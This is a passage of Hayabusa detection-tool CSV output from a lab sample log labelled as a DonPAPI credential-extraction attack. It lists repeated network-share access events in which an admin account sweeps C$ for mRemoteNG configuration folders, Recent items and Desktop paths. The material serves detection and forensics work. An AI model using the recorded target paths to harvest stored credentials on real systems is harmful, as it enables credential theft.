\??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:05.060 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:05.060 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: 
Users\Default\AppData\Local\mRemoteNG | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:05.060 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\AppData\Local\mRemoteNG | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:05.060 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\AppData\Roaming\mRemoteNG | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:05.060 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\AppData\Roaming\mRemoteNG | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:05.076 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI 
full extraction.evtx +2021-12-12 07:16:05.076 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:05.076 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:05.076 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\AppData\Local\mRemoteNG | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:05.076 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\AppData\Local\mRemoteNG | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:05.092 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 
0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:05.092 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:05.092 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:05.092 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\AppData\Roaming\mRemoteNG | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:05.092 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\AppData\Roaming\mRemoteNG | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:05.092 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File 
Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\AppData\Local\mRemoteNG | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:05.107 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:05.107 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:05.107 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:05.107 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\AppData\Local\mRemoteNG | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:05.107 
+00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\AppData\Roaming\mRemoteNG | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:05.107 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\AppData\Roaming\mRemoteNG | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:05.107 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\AppData\Local\mRemoteNG | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:05.124 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:05.124 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 
0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:05.124 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:05.124 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\AppData\Local\mRemoteNG | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:05.124 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\AppData\Roaming\mRemoteNG | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:05.124 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\AppData\Roaming\mRemoteNG | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:05.141 
+00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:05.144 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Recent | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:05.147 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:05.149 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Recent | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:05.150 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI 
full extraction.evtx +2021-12-12 07:16:05.150 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:05.150 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Recent | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:05.150 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Recent | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:05.166 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:05.166 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 
0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:05.166 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:05.166 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:05.166 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Recent | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:05.166 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Recent | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:05.166 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | 
Share Path: \??\C:\ | Path: Users\Administrator\Recent | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:05.181 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:05.181 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:05.181 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:05.181 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Recent | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:05.181 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File 
Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Recent | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:05.181 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Desktop | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:05.198 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Desktop | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:05.202 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:05.202 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 
+2021-12-12 07:16:05.202 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:05.202 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:05.202 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Desktop | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:05.202 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Desktop | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:05.202 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Desktop | IP Addr: 10.23.123.11 | LID: 
0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:05.218 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:05.218 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:05.218 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:05.218 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Desktop | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:05.218 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: 
